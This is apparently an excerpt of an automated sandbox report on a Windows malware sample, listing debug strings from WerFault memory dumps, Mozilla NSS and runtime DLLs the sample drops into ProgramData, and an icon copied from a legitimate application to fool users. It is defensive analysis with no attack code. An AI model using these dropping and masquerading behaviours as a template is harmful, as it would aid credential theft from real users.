Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3[1].dll.1.dr
Source: Binary string: propsys.pdb3 source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: iphlpapi.pdb\ source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdbs source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: winhttp.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msctf.pdbZXOG source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: rsaenh.pdbrQ source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbDX}G source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: gdiplus.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.461640685.00000000044C6000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: OnDemandConnRouteHelper.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403584503.00000000055D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474348185.0000000005052000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515274442.0000000005472000.00000004.00000001.sdmp
Source: Binary string: wmswsock.pdbW source: WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000005.00000003.268737897.00000000028E0000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.322487440.0000000002C3D000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.390319982.000000000324D000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.460504934.00000000029ED000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.500274963.0000000002F6D000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdbvX source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbh source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: WindowsCodecs.pdb source: WerFault.exe, 00000020.00000003.474348185.0000000005052000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515291891.0000000005479000.00000004.00000001.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb(XYGr source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304024163.0000000004B01000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333642964.0000000002DA1000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474404687.0000000005044000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515363571.0000000005464000.00000004.00000040.sdmp
Source: Binary string: msctf.pdbG source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: combase.pdbw source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb] source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdb@Q source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp
Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb] source: WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb<I source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: propsys.pdbNX{G source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb) source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb[ source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdb$Q.G source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp
Source: Binary string: wintrust.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: vcruntime140.i386.pdb source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, vcruntime140[1].dll.1.dr
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdbZ source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb& source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000005.00000003.273468571.0000000004B90000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304142084.0000000004B00000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333711850.0000000002DA0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361498528.0000000004C00000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403983797.00000000055C0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474779031.0000000005040000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515804409.0000000005460000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000005.00000003.273468571.0000000004B90000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304142084.0000000004B00000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333711850.0000000002DA0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361498528.0000000004C00000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403983797.00000000055C0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474779031.0000000005040000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515804409.0000000005460000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb( source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000020.00000003.462570750.00000000029F9000.00000004.00000001.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.1.dr
Source: Binary string: wininet.pdb' source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000005.00000003.273468571.0000000004B90000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304142084.0000000004B00000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333711850.0000000002DA0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361498528.0000000004C00000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403983797.00000000055C0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474779031.0000000005040000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515804409.0000000005460000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb7 source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdbX source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: OneCoreUAPCommonProxyStub.pdb<@ source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: combase.pdbb source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb{ source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: comctl32.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp

Data Obfuscation:

barindex
PE file contains sections with non-standard names
Source: mozglue[1].dll.1.dr Static PE information: section name: .didat
Source: mozglue.dll.1.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.1.dr Static PE information: section name: .didat
Source: msvcp140.dll.1.dr Static PE information: section name: .didat

Persistence and Installation Behavior:

barindex
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\freebl3[1].dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Source: initial sample Icon embedded in binary file: icon matches a legit application icon: icon.png
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
